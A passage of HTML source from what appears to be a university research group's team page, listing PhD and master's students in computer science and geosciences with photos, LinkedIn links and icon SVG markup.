11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c72-outer\">\n            <div data-colibri-id=\"182-c72\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c72 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c73\" class=\"d-block style-849 style-local-182-c73 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg\" class=\"wp-image-1336 style-849-image style-local-182-c73-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c73-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c74\" class=\"h-global-transition-all h-heading style-850 style-local-182-c74 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c74\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c75\" class=\"h-text h-text-component style-851 style-local-182-c75 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c245\" class=\"h-text h-text-component style-901 style-local-182-c245 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"style-853 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c84-outer\">\n            <div data-colibri-id=\"182-c84\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c84 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c85\" class=\"d-block style-856 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg\" class=\"wp-image-966 style-856-image style-local-182-c85-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c85-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"h-global-transition-all h-heading style-850 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c86\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c87\" class=\"h-text h-text-component style-851 style-local-182-c87 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c88\" class=\"h-text h-text-component style-852 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"style-857 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c342-outer\">\n            <div data-colibri-id=\"182-c342\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c342 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c343\" class=\"d-block style-854 style-local-182-c343 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg\" class=\"wp-image-863 style-854-image style-local-182-c343-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c343-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c344\" class=\"h-global-transition-all h-heading style-850 style-local-182-c344 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c344\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassini</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c345\" class=\"h-text h-text-component style-851 style-local-182-c345 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c346\" class=\"h-text h-text-component style-902 style-local-182-c346 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c347\" class=\"style-855 style-local-182-c347 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c348-outer\">\n            <div data-colibri-id=\"182-c348\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c348 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c349\" class=\"d-block style-854 style-local-182-c349 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit-2.jpg\" class=\"wp-image-838 style-854-image style-local-182-c349-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c349-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c350\" class=\"h-global-transition-all h-heading style-850 style-local-182-c350 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c350\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c351\" class=\"h-text h-text-component style-851 style-local-182-c351 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c352\" class=\"h-text h-text-component style-902 style-local-182-c352 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c353\" class=\"style-855 style-local-182-c353 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c354-outer\">\n            <div data-colibri-id=\"182-c354\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c354 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c355\" class=\"d-block style-854 style-local-182-c355 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/sara-edwards1.jpg\" class=\"wp-image-1399 style-854-image style-local-182-c355-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c355-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c356\" class=\"h-global-transition-all h-heading style-850 style-local-182-c356 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c356\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c357\" class=\"h-text h-text-component style-851 style-local-182-c357 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c358\" class=\"h-text h-text-component style-902 style-local-182-c358 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c359\" class=\"style-855 style-local-182-c359 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 